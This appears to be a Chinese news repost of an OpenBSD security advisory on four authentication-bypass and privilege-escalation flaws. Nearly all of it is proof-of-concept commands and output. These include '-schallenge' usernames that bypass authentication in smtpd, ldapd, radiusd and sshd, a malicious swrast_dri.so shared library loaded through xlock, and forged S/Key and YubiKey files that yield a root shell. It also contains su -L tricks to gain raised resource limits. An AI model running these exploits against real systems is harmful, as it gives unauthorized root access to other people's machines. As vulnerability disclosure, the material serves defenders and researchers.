开源操作系统 OpenBSD 被曝四个严重的认证绕过和提权漏洞（详情）

$ printf '\0-schallenge\0whatever' | openssl base64AC1zY2hhbGxlbmdlAHdoYXRldmVy
$ openssl s_client -connect 192.168.56.121:25 -starttls smtp...EHLO client.example.com...AUTH PLAIN AC1zY2hhbGxlbmdlAHdoYXRldmVy235 2.0.0 Authentication succeeded

$ ldapsearch -H ldap://192.168.56.121 -O none -U invaliduser -w whateverSASL/PLAIN authentication startedldap_sasl_interactive_bind_s: Invalid credentials (49)
$ ldapsearch -H ldap://192.168.56.121 -O none -U -schallenge -w whateverSASL/PLAIN authentication startedSASL username: -schallenge...# numResponses: 1-------------------------------

           module load "bsdauth" "/usr/libexec/radiusd/radiusd_bsdauth"           ...           authenticate * {                   authenticate-by "bsdauth"           }

$ radiusctl test 192.168.56.121 secret -schallenge password whatever    ...    Reply-Message             = "Authentication succeeded"

module set "bsdauth"  "restrict-group" "operator"

 80 int 81 main(int argc, char *argv[]) 82 {...192                                 pw = getpwnam(user);...197                                 if (gr->gr_gid == pw->pw_gid) {

 225 void 226 monitor_child_preauth(struct ssh *ssh, struct monitor *pmonitor) 227 { ... 229         int authenticated = 0, partial = 0; ... 249         while (!authenticated) { ... 288         } 289 290         if (!authctxt->valid) 291                 fatal("%s: authenticated invalid user", __func__);

$ ssh -v -F /dev/null -o PreferredAuthentications=keyboard-interactive \      -o KbdInteractiveDevices=bsdauth -l -sresponse:passwd 192.168.56.121...debug1: Next authentication method: keyboard-interactive

$ su -L -- -schallengeSegmentation fault

101 _X_HIDDEN void *102 driOpenDriver(const char *driverName)103 {...113    if (geteuid() == getuid()) {114       /* don't allow setuid apps to use LIBGL_DRIVERS_PATH */115       libPaths = getenv("LIBGL_DRIVERS_PATH");----------------------------------------------------

$ iduid=32767(nobody) gid=32767(nobody) groups=32767(nobody)
$ cd /tmp
$ cat > swrast_dri.c << "EOF"#include <paths.h>#include <sys/types.h>#include <unistd.h>
static void __attribute__ ((constructor)) _init (void) {    gid_t rgid, egid, sgid;    if (getresgid(&rgid, &egid, &sgid) != 0) _exit(__LINE__);    if (setresgid(sgid, sgid, sgid) != 0) _exit(__LINE__);
    char * const argv[] = { _PATH_KSHELL, NULL };    execve(argv[0], argv, NULL);    _exit(__LINE__);}EOF
$ gcc -fpic -shared -s -o swrast_dri.so swrast_dri.c
$ env -i /usr/X11R6/bin/Xvfb :66 -cc 0 &[1] 2706
$ env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display :66
$ iduid=32767(nobody) gid=11(auth) groups=32767(nobody)

$ iduid=32767(nobody) gid=11(auth) groups=32767(nobody)
$ echo 'root md5 0100 obsd91335 8b6d96e0ef1b1c21' > /etc/skey/root
$ chmod 0600 /etc/skey/root
$ env -i TERM=vt220 su -l -a skeyotp-md5 99 obsd91335S/Key Password: EGG LARD GROW HOG DRAG LAIN
# iduid=0(root) gid=0(wheel) ...

$ iduid=32767(nobody) gid=11(auth) groups=32767(nobody)
$ echo 32d32ddfb7d5 > /var/db/yubikey/root.uid
$ echo 554d5eedfd75fb96cc74d52609505216 > /var/db/yubikey/root.key
$ env -i TERM=vt220 su -l -a yubikeyPassword: krkhgtuhdnjclrikikklulkldlutreul
# iduid=0(root) gid=0(wheel) ...

 60 int 61 main(int argc, char **argv) 62 {...174         for (;;) {...210                 if (!class && pwd && pwd->pw_class && pwd->pw_class[0] != '\0')211                         class = strdup(pwd->pw_class);

$ iduid=1000(jane) gid=1000(jane) groups=1000(jane), 0(wheel)
$ ulimit -H -a...processes            512
$ su -l -Llogin: rootPassword:Login incorrectlogin: janePassword:
$ iduid=1000(jane) gid=1000(jane) groups=1000(jane), 0(wheel)
$ ulimit -H -a...processes            1310

$ iduid=1001(john) gid=1001(john) groups=1001(john)
$ ulimit -H -a...data(kbytes)         786432...processes            256
$ su -l -Llogin: _pbuildPassword:Login incorrectlogin: johnPassword:
$ iduid=1001(john) gid=1001(john) groups=1001(john)
$ ulimit -H -a...data(kbytes)         33554432...processes            1024